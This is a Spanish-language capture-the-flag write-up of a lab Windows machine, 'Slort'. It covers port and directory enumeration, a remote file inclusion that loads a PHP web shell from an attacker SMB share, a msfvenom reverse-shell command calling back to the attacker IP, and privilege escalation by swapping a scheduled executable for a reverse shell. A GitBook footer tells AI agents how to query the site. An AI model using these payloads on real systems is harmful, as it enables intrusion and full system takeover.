# MAQUINA SLORT (Enum de directorios Acceso a la maquina con LFI and RCI PrivEsc Auto Elevated Executable Hijacking)

Enumere los puertos abiertos de la maquina, así mismo el comando va a enumerar los servicios y versiones de cada puerto.

```
nmap --open -A -sCV --min-rate 3000 slort -oN fullscan.txt
```

![](/files/U09Pl0BR8pflpzePhQH1)

El informe de nmap me mostro datos interesantes, uno de ellos es que me enfrento a una maquina windows.

Con la herramienta nxc sin proporcionarles credenciales y aprovechando el servicio smb 445 voy a verificar ante que windows me enfrento.

![](/files/fnsIAeQ9PwmQYKrIyOZM)

Otro dato interesantes que observe fue que tengo 2 servidores web corriendo tanto el puerto 4443 como en el 8080.

Al ingresar al servidor web del puerto 4443 note que me redirigió a un directorio llamado "dashboard" donde tengo un XAMPP corriendo en dicha web.

![](/files/bvnUJFIVMdbted4da0G4)

En uno de las opciones hay un phpinfo donde ingrese y luego de una lectura encontré un usuario llamado RUPERT.

![](/files/wzTBZ3EC2ADeHRbQ1YFC)

![](/files/Db6C5ZazyZcxPu4NfkrK)

Luego pase a la búsqueda de directorios ocultos, en este caso hice fuerza bruta a la url quitando el directorio donde me redirigió al principio.

Ejecute feroxbuster y encontró varios directorios, el mas interesante el "/site"

![](/files/e7fVbvnDH5XET9VqOAXJ)

![](/files/hAXCxCYVG7DKV3W9DA26)

Aquí realice un reconocimiento en toda la web, donde me llamo la atención la URL cada vez que selecciono otro apartado.

Te explico, acá estoy en la sección o apartado con nombre "portfolio"

<http://slort:8080/site/index.php?page=portfolio.php>

.. si selecciono la opción de "service" me va a cambiar obteniendo esta URL.

<http://slort:8080/site/index.php?page=service.php>

Acá el parámetro "page" esta llamando a los archivos tanto como porfolio, service, etc..

![](/files/3EKIrq59DCV4w66xhCdv)

Me resulto interesante, por ende busque si existe hacer un LOCAL FILE INCLUSION en windows ya que esta vulnerabilidad se encuentran normalmente en entornos linux.

En esta web encontré información muy exquisita sobre los LFI en windows.

<https://dalthon.medium.com/lfi-rfi-para-servidores-windows-16665081aa3>

Según el post se puede realizar un LFI como un RFI.

Lo primero que realice fue crear un archivo básico : `""; cmd = ( _REQUEST["cmd"]); system( cmd); echo ""; die; }?>"`

, luego use impacket-smbserver para compartir el archivo php y alojarlo en la maquina. La url quedaría de la siguiente forma:

[`http://slort:8080/site/index.php?page=\\192.168.45.174\smb\p.php`](http://slort:8080/site/index.php?page=\\\192.168.45.174\smb\p.php)

`#smb es la carpeta compartida y p.php el payload.`

Ahora cree una revershell.exe con msfvenom.

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.174 LPORT=445 -f exe -o r
```

Seguidamente a través del smbserver aloje la revershell.exe colocando lo siguiente:

```
\\192.168.45.174\smb\reverse.exe
```

Quedando la URL de esta manera:

![](/files/q2mHBlQVsFrLhofWhigV)

```
http://slort:8080/site/index.php?page=\\192.168.45.174\smb\p.php&\\192.168.45.174\smb\reverse.exe
```

En otra terminal me pongo a la escucha con netcat en el puerto de la revershell. En el mismo instante envié la petición y obtuve la conexión con netcat.

Ya con acceso a la maquina hice un reconocimiento de ella para encontrar la forma de escalar privilegios.

En la carpeta Backup encontré unos archivos de texto y un ejecutable que al leer cada archivo el mas interesante es el info.txt donde me indica que cada 5 min se ejecuta el archivo .exe.

Probé si podía cambiar el nombre del ejecutable lo cual funciono, por ende acá puedo abusar o aprovechar de este ejecutable y suplantarlo con una revershell para obtener acceso como administrador en el caso de que lo ejecute el administrador.

![](/files/EO9VL0ON9IKuY8WetPJX)

Con el comando move moví el archivo y le coloque nombre TFTP.EXE.OLD

![](/files/2RCVCuC0Nt9CdW0oKSFb)![](/files/rVrHuhKOCTXTG22UPaX3)

Aquí creo la revershell con nombre TFTP.EXE y la subo a la maquina a través de un servidor con python.

![](/files/aAcV6K1FkniNESqgmQp2)

![](/files/ACVa3DaDRqUcnjW1NyIY)

Luego espero un tiempito y obtuve acceso como usuario administrador.

![](/files/Cto65m6Vl0cmGhvnbfbl)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://1gnotus.gitbook.io/ignotus_pwn/proving-ground-practice-and-play/writeup/maquina-slort-enum-de-directorios-acceso-a-la-maquina-con-lfi-and-rci-privesc-auto-elevated-executab.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.